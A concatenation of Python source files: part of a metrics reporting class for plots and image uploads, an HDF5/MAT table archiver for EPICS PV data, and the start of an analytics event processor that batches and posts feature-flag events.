d[k] = floatstr(v)
plot = json.dumps(plot, default=default)
elif not isinstance(plot, six.string_types):
raise ValueError('Plot should be a string or a dict')
ev = PlotEvent(metric=self._normalize_name(title), variant=self._normalize_name(series),
plot_str=plot, iter=iter)
self._report(ev)
def report_image(self, title, series, src, iter):
"""
Report an image.
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param src: Image source URI. This URI will be used by the webapp and workers when trying to obtain the image
for presentation of processing. Currently only http(s), file and s3 schemes are supported.
:type src: str
:param iter: Iteration number
:type value: int
"""
ev = ImageEventNoUpload(metric=self._normalize_name(title), variant=self._normalize_name(series), iter=iter,
src=src)
self._report(ev)
def report_media(self, title, series, src, iter):
"""
Report a media link.
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param src: Media source URI. This URI will be used by the webapp and workers when trying to obtain the image
for presentation of processing. Currently only http(s), file and s3 schemes are supported.
:type src: str
:param iter: Iteration number
:type value: int
"""
ev = ImageEventNoUpload(metric=self._normalize_name(title), variant=self._normalize_name(series), iter=iter,
src=src)
self._report(ev)
def report_image_and_upload(self, title, series, iter, path=None, image=None, upload_uri=None,
max_image_history=None, delete_after_upload=False):
"""
Report an image and upload its contents. Image is uploaded to a preconfigured bucket (see setup_upload()) with
a key (filename) describing the task ID, title, series and iteration.
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param iter: Iteration number
:type iter: int
:param path: A path to an image file. Required unless matrix is provided.
:type path: str
:param image: Image data. Required unless filename is provided.
:type image: A PIL.Image.Image object or a 3D numpy.ndarray object
:param max_image_history: maximum number of image to store per metric/variant combination
use negative value for unlimited. default is set in global configuration (default=5)
:param delete_after_upload: if True, one the file was uploaded the local copy will be deleted
:type delete_after_upload: boolean
"""
if not self._storage_uri and not upload_uri:
raise ValueError('Upload configuration is required (use setup_upload())')
if len([x for x in (path, image) if x is not None]) != 1:
raise ValueError('Expected only one of [filename, image]')
kwargs = dict(metric=self._normalize_name(title), variant=self._normalize_name(series), iter=iter,
file_history_size=max_image_history)
ev = ImageEvent(image_data=image, upload_uri=upload_uri, local_image_path=path,
delete_after_upload=delete_after_upload, **kwargs)
self._report(ev)
def report_media_and_upload(self, title, series, iter, path=None, stream=None, upload_uri=None,
file_extension=None, max_history=None, delete_after_upload=False):
"""
Report a media file/stream and upload its contents.
Media is uploaded to a preconfigured bucket
(see setup_upload()) with a key (filename) describing the task ID, title, series and iteration.
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param iter: Iteration number
:type iter: int
:param path: A path to an image file. Required unless matrix is provided.
:type path: str
:param stream: File/String stream
:param file_extension: file extension to use when stream is passed
:param max_history: maximum number of files to store per metric/variant combination
use negative value for unlimited. default is set in global configuration (default=5)
:param delete_after_upload: if True, one the file was uploaded the local copy will be deleted
:type delete_after_upload: boolean
"""
if not self._storage_uri and not upload_uri:
raise ValueError('Upload configuration is required (use setup_upload())')
if len([x for x in (path, stream) if x is not None]) != 1:
raise ValueError('Expected only one of [filename, stream]')
if isinstance(stream, six.string_types):
stream = six.StringIO(stream)
kwargs = dict(metric=self._normalize_name(title), variant=self._normalize_name(series), iter=iter,
file_history_size=max_history)
ev = MediaEvent(stream=stream, upload_uri=upload_uri, local_image_path=path,
override_filename_ext=file_extension,
delete_after_upload=delete_after_upload, **kwargs)
self._report(ev)
def report_histogram(self, title, series, histogram, iter, labels=None, xlabels=None,
xtitle=None, ytitle=None, comment=None, mode='group', layout_config=None):
"""
Report an histogram bar plot
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param histogram: The histogram data.
A row for each dataset(bar in a bar group). A column for each bucket.
:type histogram: numpy array
:param iter: Iteration number
:type value: int
:param labels: The labels for each bar group.
:type labels: list of strings.
:param xlabels: The labels of the x axis.
:type xlabels: List of strings.
:param str xtitle: optional x-axis title
:param str ytitle: optional y-axis title
:param comment: comment underneath the title
:type comment: str
:param mode: multiple histograms mode. valid options are: stack / group / relative. Default is 'group'.
:type mode: str
:param layout_config: optional dictionary for layout configuration, passed directly to plotly
:type layout_config: dict or None
"""
assert mode in ('stack', 'group', 'relative')
plotly_dict = create_2d_histogram_plot(
np_row_wise=histogram,
title=title,
xtitle=xtitle,
ytitle=ytitle,
labels=labels,
series=series,
xlabels=xlabels,
comment=comment,
mode=mode,
layout_config=layout_config,
)
return self.report_plot(
title=self._normalize_name(title),
series=self._normalize_name(series),
plot=plotly_dict,
iter=iter,
)
def report_table(self, title, series, table, iteration, layout_config=None):
"""
Report a table plot.
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param table: The table data
:type table: pandas.DataFrame
:param iteration: Iteration number
:type iteration: int
:param layout_config: optional dictionary for layout configuration, passed directly to plotly
:type layout_config: dict or None
"""
table_output = create_plotly_table(table, title, series, layout_config=layout_config)
return self.report_plot(
title=self._normalize_name(title),
series=self._normalize_name(series),
plot=table_output,
iter=iteration,
round_digits=False,
)
def report_line_plot(self, title, series, iter, xtitle, ytitle, mode='lines', reverse_xaxis=False,
comment=None, layout_config=None):
"""
Report a (possibly multiple) line plot.
:param title: Title (AKA metric)
:type title: str
:param series: All the series' data, one for each line in the plot.
:type series: An iterable of LineSeriesInfo.
:param iter: Iteration number
:type iter: int
:param xtitle: x-axis title
:type xtitle: str
:param ytitle: y-axis title
:type ytitle: str
:param mode: 'lines' / 'markers' / 'lines+markers'
:type mode: str
:param reverse_xaxis: If true X axis will be displayed from high to low (reversed)
:type reverse_xaxis: bool
:param comment: comment underneath the title
:type comment: str
:param layout_config: optional dictionary for layout configuration, passed directly to plotly
:type layout_config: dict or None
"""
plotly_dict = create_line_plot(
title=title,
series=series,
xtitle=xtitle,
ytitle=ytitle,
mode=mode,
reverse_xaxis=reverse_xaxis,
comment=comment,
layout_config=layout_config,
)
return self.report_plot(
title=self._normalize_name(title),
series='',
plot=plotly_dict,
iter=iter,
)
def report_2d_scatter(self, title, series, data, iter, mode='lines', xtitle=None, ytitle=None, labels=None,
comment=None, layout_config=None):
"""
Report a 2d scatter graph (with lines)
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param data: A scattered data: pairs of x,y as rows in a numpy array
:type scatter: ndarray
:param iter: Iteration number
:type iter: int
:param mode: (type str) 'lines'/'markers'/'lines+markers'
:param xtitle: optional x-axis title
:param ytitle: optional y-axis title
:param labels: label (text) per point in the scatter (in the same order)
:param comment: comment underneath the title
:type comment: str
:param layout_config: optional dictionary for layout configuration, passed directly to plotly
:type layout_config: dict or None
"""
plotly_dict = create_2d_scatter_series(
np_row_wise=data,
title=title,
series_name=series,
mode=mode,
xtitle=xtitle,
ytitle=ytitle,
labels=labels,
comment=comment,
layout_config=layout_config,
)
return self.report_plot(
title=self._normalize_name(title),
series=self._normalize_name(series),
plot=plotly_dict,
iter=iter,
)
def report_3d_scatter(self, title, series, data, iter, labels=None, mode='lines', color=((217, 217, 217, 0.14),),
marker_size=5, line_width=0.8, xtitle=None, ytitle=None, ztitle=None, fill=None,
comment=None, layout_config=None):
"""
Report a 3d scatter graph (with markers)
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param data: A scattered data: pairs of x,y,z as rows in a numpy array. or list of numpy arrays
:type data: ndarray.
:param iter: Iteration number
:type iter: int
:param labels: label (text) per point in the scatter (in the same order)
:type labels: str
:param mode: (type str) 'lines'/'markers'/'lines+markers'
:param color: list of RGBA colors [(217, 217, 217, 0.14),]
:param marker_size: marker size in px
:param line_width: line width in px
:param xtitle: optional x-axis title
:param ytitle: optional y-axis title
:param ztitle: optional z-axis title
:param comment: comment underneath the title
:param layout_config: optional dictionary for layout configuration, passed directly to plotly
:type layout_config: dict or None
"""
data_series = data if isinstance(data, list) else [data]
def get_labels(i):
if labels and isinstance(labels, list):
try:
item = labels[i]
except IndexError:
item = labels[-1]
if isinstance(item, list):
return item
return labels
plotly_obj = plotly_scatter3d_layout_dict(
title=title,
xaxis_title=xtitle,
yaxis_title=ytitle,
zaxis_title=ztitle,
comment=comment,
layout_config=layout_config,
)
for i, values in enumerate(data_series):
plotly_obj = create_3d_scatter_series(
np_row_wise=values,
title=title,
series_name=series[i] if isinstance(series, list) else None,
labels=get_labels(i),
plotly_obj=plotly_obj,
mode=mode,
line_width=line_width,
marker_size=marker_size,
color=color,
fill_axis=fill,
)
return self.report_plot(
title=self._normalize_name(title),
series=self._normalize_name(series) if not isinstance(series, list) else None,
plot=plotly_obj,
iter=iter,
)
def report_value_matrix(self, title, series, data, iter, xtitle=None, ytitle=None, xlabels=None, ylabels=None,
yaxis_reversed=False, comment=None, layout_config=None):
"""
Report a heat-map matrix
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param data: A heat-map matrix (example: confusion matrix)
:type data: ndarray
:param iter: Iteration number
:type iter: int
:param str xtitle: optional x-axis title
:param str ytitle: optional y-axis title
:param xlabels: optional label per column of the matrix
:param ylabels: optional label per row of the matrix
:param bool yaxis_reversed: If False 0,0 is at the bottom left corner. If True 0,0 is at the Top left corner
:param comment: comment underneath the title
:param layout_config: optional dictionary for layout configuration, passed directly to plotly
:type layout_config: dict or None
"""
plotly_dict = create_value_matrix(
np_value_matrix=data,
title=title,
xlabels=xlabels,
ylabels=ylabels,
series=series,
comment=comment,
xtitle=xtitle,
ytitle=ytitle,
yaxis_reversed=yaxis_reversed,
layout_config=layout_config,
)
return self.report_plot(
title=self._normalize_name(title),
series=self._normalize_name(series),
plot=plotly_dict,
iter=iter,
)
def report_value_surface(self, title, series, data, iter, xlabels=None, ylabels=None,
xtitle=None, ytitle=None, ztitle=None, camera=None, comment=None, layout_config=None):
"""
Report a 3d surface (same data as heat-map matrix, only presented differently)
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param data: A heat-map matrix (example: confusion matrix)
:type data: ndarray
:param iter: Iteration number
:type iter: int
:param xlabels: optional label per column of the matrix
:param ylabels: optional label per row of the matrix
:param xtitle: optional x-axis title
:param ytitle: optional y-axis title
:param ztitle: optional z-axis title
:param camera: X,Y,Z camera position. def: (1,1,1)
:param comment: comment underneath the title
:param layout_config: optional dictionary for layout configuration, passed directly to plotly
:type layout_config: dict or None
"""
plotly_dict = create_3d_surface(
np_value_matrix=data,
title=title + '/' + series,
xlabels=xlabels,
ylabels=ylabels,
series=series,
xtitle=xtitle,
ytitle=ytitle,
ztitle=ztitle,
camera=camera,
comment=comment,
layout_config=layout_config,
)
return self.report_plot(
title=self._normalize_name(title),
series=self._normalize_name(series),
plot=plotly_dict,
iter=iter,
)
def report_image_plot_and_upload(self, title, series, iter, path=None, matrix=None,
upload_uri=None, max_image_history=None, delete_after_upload=False):
"""
Report an image as plot and upload its contents.
Image is uploaded to a preconfigured bucket (see setup_upload()) with a key (filename)
describing the task ID, title, series and iteration.
Then a plotly object is created and registered, this plotly objects points to the uploaded image
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param iter: Iteration number
:type value: int
:param path: A path to an image file. Required unless matrix is provided.
:type path: str
:param matrix: A 3D numpy.ndarray object containing image data (RGB). Required unless filename is provided.
:type matrix: str
:param upload_uri: upload image destination (str)
:type upload_uri: str
:param max_image_history: maximum number of image to store per metric/variant combination
use negative value for unlimited. default is set in global configuration (default=5)
:param delete_after_upload: if True, one the file was uploaded the local copy will be deleted
:type delete_after_upload: boolean
"""
if not upload_uri and not self._storage_uri:
raise ValueError('Upload configuration is required (use setup_upload())')
if len([x for x in (path, matrix) if x is not None]) != 1:
raise ValueError('Expected only one of [filename, matrix]')
kwargs = dict(metric=self._normalize_name(title), variant=self._normalize_name(series), iter=iter,
file_history_size=max_image_history)
if matrix is not None:
width = matrix.shape[1]
height = matrix.shape[0]
else:
# noinspection PyBroadException
try:
from PIL import Image
width, height = Image.open(path).size
except Exception:
width = 640
height = 480
ev = UploadEvent(image_data=matrix, upload_uri=upload_uri, local_image_path=path,
delete_after_upload=delete_after_upload, **kwargs)
_, url = ev.get_target_full_upload_uri(upload_uri or self._storage_uri, self._metrics.storage_key_prefix)
# Hack: if the url doesn't start with http/s then the plotly will not be able to show it,
# then we put the link under images not plots
if not url.startswith('http') and not self._offline_mode:
return self.report_image_and_upload(title=title, series=series, iter=iter, path=path, image=matrix,
upload_uri=upload_uri, max_image_history=max_image_history)
self._report(ev)
plotly_dict = create_image_plot(
image_src=url,
title=title + '/' + series,
width=640,
height=int(640*float(height or 480)/float(width or 640)),
)
return self.report_plot(
title=self._normalize_name(title),
series=self._normalize_name(series),
plot=plotly_dict,
iter=iter,
)
@classmethod
def _normalize_name(cls, name):
return name
def __exit__(self, exc_type, exc_val, exc_tb):
# don't flush in case an exception was raised
if not exc_type:
self.flush()
|
h5tablewriter.py
|
#!/usr/bin/env python
from __future__ import division, print_function, unicode_literals
import time
import signal
import sys
import os
import shutil
import platform
import errno
import select
import logging
import threading
try:
from ConfigParser import SafeConfigParser as _ConfigParser, NoOptionError
class ConfigParser(_ConfigParser):
# enable dict-like access as with py3
class SectionProxy(object):
def __init__(self, conf, sect):
self.conf, self.sect = conf, sect
def __getitem__(self, key):
try:
return self.conf.get(self.sect, key)
except NoOptionError:
raise KeyError(key)
def get(self, key, defval=None):
try:
return self.conf.get(self.sect, key)
except NoOptionError:
return defval
def __getitem__(self, section):
if section!='DEFAULT' and not self.has_section(section):
raise KeyError(section)
return self.SectionProxy(self, section)
except ImportError:
from configparser import SafeConfigParser as ConfigParser
import numpy
import h5py
from p4p.client.thread import Context, Disconnected
_log = logging.getLogger(__name__)
ref_dtype = h5py.special_dtype(ref=h5py.Reference)
def getargs():
from argparse import ArgumentParser
A = ArgumentParser(description="""Poor man's BSAS archiver.
Run with *TBL PV name, and prefix for output files.
Switches to a new file on SIGHUP or SIGUSR1.
Graceful exit on SIGINT.
Writes HDF5 files which attempt to be MAT 7.3 compatible.
""")
A.add_argument('conf', metavar='FILE', help='configuration file')
A.add_argument('--section', metavar='NAME', default='DEFAULT', help='configure file section to use')
A.add_argument('-v', '--verbose', action='store_const', const=logging.DEBUG, default=logging.INFO)
A.add_argument('-q', '--quiet', action='store_const', const=logging.WARN, dest='verbose')
A.add_argument('-C', '--check', action='store_true', default=False, help="Exit after reading configuration file")
return A.parse_args()
def matheader(fname):
"""The magic header used to distinguish Matlab .mat files from
everyday ordinary run of the mill HDF5 files.
https://pythonhosted.org/hdf5storage/storage_format.html#matlab-file-header
"""
I = {}
I['major'], I['minor'], I['micro'] = sys.version_info[:3]
H = 'MATLAB 7.3 MAT-file, Platform: CPython %(major)d.%(minor)d.%(micro)d, Created on: %%a %%b %%d %%H:%%M:%%S %%Y HDF5 schema 1.00 .'%I
H = time.strftime(H).encode('ascii')
assert len(H)<(128-12), repr(H)
H = H + b' '*(128-12-len(H)) + b'\0\0\0\0\0\0\0\0\x00\x02\x49\x4d'
assert len(H)==128, repr(H)
# we are writing into the userblock, which is assumed to be at least 128 bytes long.
# we ensure this below when creating new files.
with open(fname, 'r+b') as F:
F.write(H)
# values for the magic 'MATLAB_class' attribute on datasets
_mat_class = {
numpy.dtype('f4'): numpy.string_('single'),
numpy.dtype('f8'): numpy.string_('double'),
numpy.dtype('u1'): numpy.string_('uint8'),
numpy.dtype('u2'): numpy.string_('uint16'),
numpy.dtype('u4'): numpy.string_('uint32'),
numpy.dtype('u8'): numpy.string_('uint64'),
numpy.dtype('i1'): numpy.string_('int8'),
numpy.dtype('i2'): numpy.string_('int16'),
numpy.dtype('i4'): numpy.string_('int32'),
numpy.dtype('i8'): numpy.string_('int64'),
# TODO: bool and some string types
}
class TableWriter(object):
context = Context('pva', unwrap=False)
def __init__(self, conf, wakeup=None, check=False):
self._wakeup = wakeup
# pull out mandatory config items now
self.pv = conf['tablePV']
self.ftemplate = conf['outfile'] # passed through time.strftime()
self.ftemp = conf.get('scratch', '/tmp/bsas_%s.h5'%self.pv)
self.temp_limit = int( float(conf.get('temp_limit', '0'))*(2**30) ) # in bytes
if self.temp_limit <= 0:
stat = os.statvfs(os.path.dirname(self.ftemp))
# by default, limit ourself to a fraction of the FS capacity
self.temp_limit = int(stat.f_frsize*stat.f_blocks*0.25)
self.temp_period = float(conf.get('temp_period', '60'))*60.0 # in sec.
self.group = conf.get('file_group', '/')
if check:
raise KeyboardInterrupt()
# guards open HDF5 file, and our attributes.
# serialize main thread and PVA worker
self.lock = threading.Lock()
self.nextref = 0
self.initial = True
self.prevstart = None
self.F, self.G = None, None # h5py.File and h5py.Group
self._migrate = None
_log.info("Create subscription")
self.S = self.context.monitor(self.pv, self._update, request='field()record[pipeline=True]', notify_disconnect=True)
def close(self): # self.lock is locked
_log.info("Close subscription")
self.S.close()
_log.info("Final flush")
self.flush(force=True)
if self._migrate is not None:
_log.info("Wait for final migration")
self._migrate.join()
_log.info("final migration complete")
def _update(self, val):
# called from PVA worker only
start, prevstart = time.time(), self.prevstart
self.prevstart = start
_log.debug('Update')
with self.lock:
self.__update(val)
if prevstart is None:
return
end = time.time()
interval = start-prevstart # >= the server update interval (based on previous update)
dT = end-start # our processing time for this update
if dT >= interval*0.75:
_log.warn("Processing time %.2f approaches threshold %.2f", dT, interval)
else:
_log.info("Processing time %.2f, threshold %.2f", dT, interval)
def __update(self, val): # self.lock is locked
if isinstance(val, Disconnected):
_log.warn("Table PV disconnect")
self.initial = True
self.flush()
return
elif self.initial:
_log.warn("Table PV (re)connect")
self.initial = False
return # ignore initial update
elif self.F is None:
self.open() # lazy (re)open on first update
for fld, lbl in zip(val.value.keys(), val.labels):
V = val.value[fld]
if isinstance(V, numpy.ndarray):
new, = V.shape
try:
D = self.G[fld]
except KeyError:
D = self.G.create_dataset(fld, dtype=V.dtype,
shape=(0, 1), chunks=None, maxshape=(None, 1),
shuffle=True, compression='gzip')
D.attrs['label'] = lbl
D.attrs['MATLAB_class'] = _mat_class[V.dtype]
cur, _one = D.shape
D.resize((cur+new, 1))
D[cur:, 0] = V # copy
elif isinstance(V, list): # union[]
# store as cell array
try:
D = self.G[fld]
except KeyError:
D = self.G.create_dataset(fld, dtype=ref_dtype,
shape=(0, 1), chunks=None, maxshape=(None, 1))
D.attrs['label'] = lbl
D.attrs['MATLAB_class'] = numpy.string_("cell")
refs = []
_refs_ = self.G.require_group('#refs#')
_path = numpy.string_(_refs_.name.encode('ascii'))
# placeholder for empty cells
try:
null = _refs_['null']
except KeyError:
null = _refs_.create_dataset('null', data=numpy.asarray([0,1], dtype='u8'))
null.attrs['MATLAB_class'] = numpy.string_('double')
null.attrs['H5PATH'] = _path
null.attrs['MATLAB_empty'] = numpy.asarray(1, dtype='u1')
for img in V:
if img is None:
refs.append(null.ref)
else:
dset = _refs_.create_dataset('cellval%d'%self.nextref, data=img,
shuffle=True, compression='gzip', compression_opts=9)
dset.attrs['MATLAB_class'] = _mat_class[img.dtype]
dset.attrs['H5PATH'] = _path
refs.append(dset.ref)
self.nextref += 1
cur, _one = D.shape
D.resize((cur+new, 1))
D[cur:, 0] = refs
self.F.flush() # flush this update to disk
self.flush()
def flush(self, force=False): # self.lock is locked
if self.F is not None:
self.F.flush()
age = time.time()-self.F_time
size = os.stat(self.ftemp).st_size
if not force and age < self.temp_period and size < self.temp_limit:
_log.info('Skip rotate, too new (%.2f < %.2f) or too small (%d < %d)', age, self.temp_period, size, self.temp_limit)
return
_log.info('Close and rotate')
self.F.close()
self.F, self.G = None, None
if os.path.isfile(self.ftemp):
if self._migrate is not None:
# We only pipeline a single migration.
# If this hasn't completed, then we stall until it has.
self._migrate.join(0.01)
if self._migrate.isAlive():
_log.warn("Flush stalls waiting for previous migration to complete. Prepare for data loss!")
self._migrate.join()
self._migrate = None
_log.info("Previous migration complete")
_log.info("Starting migration of '%s'", self.ftemp)
stage2 = self.ftemp+'.tmp'
if os.path.isfile(stage2):
_log.error("Overwriting debris '%s' !", stage2)
os.rename(self.ftemp, stage2)
self._migrate = threading.Thread(name='BSAS Migration', target=self._movefile, args=(stage2,))
self._migrate.start()
def _movefile(self, stage2):
# called from migration thread only
finalpath = None
try:
start = time.time()
# expand template with last mod time (instead of current time)
mtime = os.stat(stage2).st_mtime
finalpath = time.strftime(self.ftemplate, time.gmtime(mtime)) # expand using UTC
if os.path.isfile(finalpath):
_log.error("Migration destination '%s' already exists. Prepare for data loss!")
os.remove(finalpath)
_log.info('Migrate %s -> %s', stage2, finalpath)
try:
os.makedirs(os.path.dirname(finalpath))
except OSError:
pass #if we failed, then the move will also fail
shutil.move(stage2, finalpath)
end = time.time()
_log.info("Migration of '%s' complete after %.2f sec", finalpath, end-start)
except:
_log.exception("Failure during Migration of '%s' -> '%s'", stage2, finalpath)
def open(self): # self.lock is locked
self.flush()
_log.info('Open "%s"', self.ftemp)
with h5py.File(self.ftemp, 'w-', userblock_size=512) as F: # error if already exists
assert F.userblock_size>=128, F.userblock_size
matheader(self.ftemp)
self.F = h5py.File(self.ftemp, 'r+') # error if not exists
self.F_time = time.time()
self.G = self.F.require_group(self.group)
self.nextref = 0
def __enter__(self):
return self
def __exit__(self, A,B,C):
with self.lock:
self.close()
class SigWake(object):
def __enter__(self):
self._R, self._W = os.pipe()
self.prevHUP = signal.signal(signal.SIGHUP, self._wake)
self.prevUSR1 = signal.signal(signal.SIGUSR1, self._wake)
return self
def __exit__(self, A,B,C):
signal.signal(signal.SIGHUP, self.prevHUP)
signal.signal(signal.SIGUSR1, self.prevUSR1)
os.close(self._R)
os.close(self._W)
def _wake(self, num, frame):
self.poke()
def poke(self):
os.write(self._W, '!')
def wait(self, timeout=None):
try:
Rs, _Ws, _Es = select.select([self._R], [], [], timeout)
if self._R in Rs:
os.read(self._R, 1)
except select.error:
pass # assume EINTR
except OSError as e:
if e.errno!=errno.EINTR:
raise
signal.signal(signal.SIGHUP, self._wake)
signal.signal(signal.SIGUSR1, self._wake)
def set_proc_name(newname):
if platform.system()!='Linux':
_log.warn("Don't know how to set process name")
return
newname = newname[:15]
from ctypes import cdll, byref, create_string_buffer
libc = cdll.LoadLibrary(None)
buff = create_string_buffer(len(newname)+1)
buff.value = newname
libc.prctl(15, byref(buff), 0, 0, 0) # PR_SET_NAME=15 on Linux
def main(conf):
try:
with SigWake() as S:
with TableWriter(conf, check=args.check) as W:
_log.info("Running")
while True:
S.wait(W.temp_period/4.)
with W.lock:
W.flush()
except KeyboardInterrupt:
pass
_log.info("Done")
if __name__=='__main__':
# set process name to allow external tools like eg. logrotate
# to force us to start a new file.
# killall -s SIGUSR1 h5tablewriter
set_proc_name('h5tablewriter')
args = getargs()
conf = ConfigParser({
'PWD':os.path.dirname(args.conf),
'scratch':'/tmp/%(tablePV)s.h5',
})
with open(args.conf, 'r') as F:
conf.readfp(F)
logging.basicConfig(level=args.verbose)
main(conf[args.section])
|
event_processor.py
|
"""
Implementation details of the analytics event delivery component.
"""
# currently excluded from documentation - see docs/README.md
from calendar import timegm
from collections import namedtuple
from email.utils import parsedate
import errno
import json
from threading import Event, Lock, Thread
import time
import uuid
import queue
import urllib3
from ldclient.event_summarizer import EventSummarizer
from ldclient.fixed_thread_pool import FixedThreadPool
from ldclient.impl.http import _http_factory
from ldclient.lru_cache import SimpleLRUCache
from ldclient.user_filter import UserFilter
from ldclient.interfaces import EventProcessor
from ldclient.repeating_timer import RepeatingTimer
from ldclient.util import UnsuccessfulResponseException
from ldclient.util import log
from ldclient.util import check_if_error_is_recoverable_and_log, is_http_error_recoverable, stringify_attrs, throw_if_unsuccessful_response, _headers
from ldclient.diagnostics import create_diagnostic_init
__MAX_FLUSH_THREADS__ = 5
__CURRENT_EVENT_SCHEMA__ = 3
__USER_ATTRS_TO_STRINGIFY_FOR_EVENTS__ = [ "key", "secondary", "ip", "country", "email", "firstName", "lastName", "avatar", "name" ]
EventProcessorMessage = namedtuple('EventProcessorMessage', ['type', 'param'])
class EventOutputFormatter:
def __init__(self, config):
self._inline_users = config.inline_users_in_events
self._user_filter = UserFilter(config)
def make_output_events(self, events, summary):
events_out = [ self.make_output_event(e) for e in events ]
if len(summary.counters) > 0:
events_out.append(self.make_summary_event(summary))
return events_out
def make_output_event(self, e):
kind = e['kind']
if kind == 'feature':
is_debug = e.get('debug')
out = {
'kind': 'debug' if is_debug else 'feature',
'creationDate': e['creationDate'],
'key': e['key'],
'version': e.get('version'),
'variation': e.get('variation'),
'value': e.get('value'),
'default': e.get('default'),
'prereqOf': e.get('prereqOf')
}
if self._inline_users or is_debug:
out['user'] = self._process_user(e)
else:
out['userKey'] = self._get_userkey(e)
if e.get('reason'):
out['reason'] = e.get('reason')
if e.get('contextKind'):
out['contextKind'] = e.get('contextKind')
return out
elif kind == 'identify':
return {
'kind': 'identify',
'creationDate': e['creationDate'],
'key': self._get_userkey(e),
'user': self._process_user(e)
}
elif kind == 'custom':
out = {
'kind': 'custom',
'creationDate': e['creationDate'],
'key': e['key']
}
if self._inline_users:
out['user'] = self._process_user(e)
else:
out['userKey'] = self._get_userkey(e)
if e.get('data') is not None:
out['data'] = e['data']
if e.get('metricValue') is not None:
out['metricValue'] = e['metricValue']
if e.get('contextKind'):
out['contextKind'] = e.get('contextKind')
return out
elif kind == 'index':
return {
'kind': 'index',
'creationDate': e['creationDate'],
'user': self._process_user(e)
}
else:
return e
"""
Transform summarizer data into the format used for the event payload.
"""
def make_summary_event(self, summary):
flags_out = dict()
for ckey, cval in summary.counters.items():
flag_key, variation, version = ckey
flag_data = flags_out.get(flag_key)
if flag_data is None:
flag_data = { 'default': cval['default'], 'counters': [] }
flags_out[flag_key] = flag_data
counter = {
'count': cval['count'],
'value': cval['value']
}
if variation is not None:
counter['variation'] = variation
if version is None:
counter['unknown'] = True
else:
counter['version'] = version
flag_data['counters'].append(counter)
return {
'kind': 'summary',
'startDate': summary.start_date,
'endDate': summary.end_date,
'features': flags_out
}
def _process_user(self, event):
filtered = self._user_filter.filter_user_props(event['user'])
return stringify_attrs(filtered, __USER_ATTRS_TO_STRINGIFY_FOR_EVENTS__)
def _get_userkey(self, event):
return str(event['user'].get('key'))
class EventPayloadSendTask:
def __init__(self, http, config, formatter, payload, response_fn):
self._http = http
self._config = config
self._formatter = formatter
self._payload = payload
self._response_fn = response_fn
def run(self):
try:
output_events = self._formatter.make_output_events(self._payload.events, self._payload.summary)
resp = self._do_send(output_events)
except Exception:
log.warning(
'Unhandled exception in event processor. Analytics events were not processed.',
exc_info=True)
def _do_send(self, output_events):
# noinspection PyBroadException
try:
json_body = json.dumps(output_events)
log.debug('Sending events payload: ' + json_body)
payload_id = str(uuid.uuid4())
r = _post_events_with_retry(
self._http,
self._config,
self._config.events_uri,
payload_id,
json_body,
"%d events" % len(self._payload.events)
)
if r:
self._response_fn(r)
return r
except Exception as e:
log.warning(
'Unhandled exception in event processor. Analytics events were not processed. [%s]', e)
class DiagnosticEventSendTask:
def __init__(self, http, config, event_body):
self._http = http
self._config = config
self._event_body = event_body
def run(self):
# noinspection PyBroadException
try:
json_body = json.dumps(self._event_body)
log.debug('Sending diagnostic event: ' + json_body)
_post_events_with_retry(
self._http,
self._config,
self._config.events_base_uri + '/diagnostic',
None,
json_body,
"diagnostic event"
)
except Exception as e:
log.warning(
'Unhandled exception in event processor. Diagnostic event was not sent. [%s]', e)
FlushPayload = namedtuple('FlushPayload', ['events', 'summary'])
class EventBuffer:
def __init__(self, capacity):
self._capacity = capacity
self._events = []
self._summarizer = EventSummarizer()
self._exceeded_capacity = False
self._dropped_events = 0
def add_event(self, event):
if len(self._events) >= self._capacity:
self._dropped_events += 1
if not self._exceeded_capacity:
log.warning("Exceeded event queue capacity. Increase capacity to avoid dropping events.")
self._exceeded_capacity = True
else:
self._events.append(event)
self._exceeded_capacity = False
def add_to_summary(self, event):
self._summarizer.summarize_event(event)
def get_and_clear_dropped_count(self):
dropped_count = self._dropped_events
self._dropped_events = 0
return dropped_count
def get_payload(self):
return FlushPayload(self._events, self._summarizer.snapshot())
def clear(self):
self._events = []
self._summarizer.clear()
class EventDispatcher:
def __init__(self, inbox, config, http_client, diagnostic_accumulator=None):
self._inbox = inbox
self._config = config
self._http = _http_factory(config).create_pool_manager(1, config.events_uri) if http_client is None else http_client
self._close_http = (http_client is None) # so we know whether to close it later
self._disabled = False
self._outbox = EventBuffer(config.events_max_pending)
self._user_keys = SimpleLRUCache(config.user_keys_capacity)
self._formatter = EventOutputFormatter(config)
self._last_known_past_time = 0
self._deduplicated_users = 0
self._diagnostic_accumulator = None if config.diagnostic_opt_out else diagnostic_accumulator
self._flush_workers = FixedThreadPool(__MAX_FLUSH_THREADS__, "ldclient.flush")
self._diagnostic_flush_workers = None if self._diagnostic_accumulator is None else FixedThreadPool(1, "ldclient.diag_flush")
if self._diagnostic_accumulator is not None:
init_event = create_diagnostic_init(self._diagnostic_accumulator.data_since_date,
self._diagnostic_accumulator.diagnostic_id,
config)
task = DiagnosticEventSendTask(self._http, self._config, init_event)
self._diagnostic_flush_workers.execute(task.run)
self._main_thread = Thread(target=self._run_main_loop)
self._main_thread.daemon = True
self._main_thread.start()
def _run_main_loop(self):
log.info("Starting event processor")
while True:
try:
message = self._inbox.get(block=True)
if message.type == 'event':
self._process_event(message.param)
elif message.type == 'flush':
self._trigger_flush()
elif message.type == 'flush_users':
self._user_keys.clear()
elif message.type == 'diagnostic':
self._send_and_reset_diagnostics()
elif message.type == 'test_sync':
self._flush_workers.wait()
if self._diagnostic_accumulator is not None:
self._diagnostic_flush_workers.wait()
message.param.set()
elif message.type == 'stop':
self._do_shutdown()
message.param.set()
return
except Exception:
log.error('Unhandled exception in event processor', exc_info=True)
def _process_event(self, event):
if self._disabled:
return
# Always record the event in the summarizer.
self._outbox.add_to_summary(event)
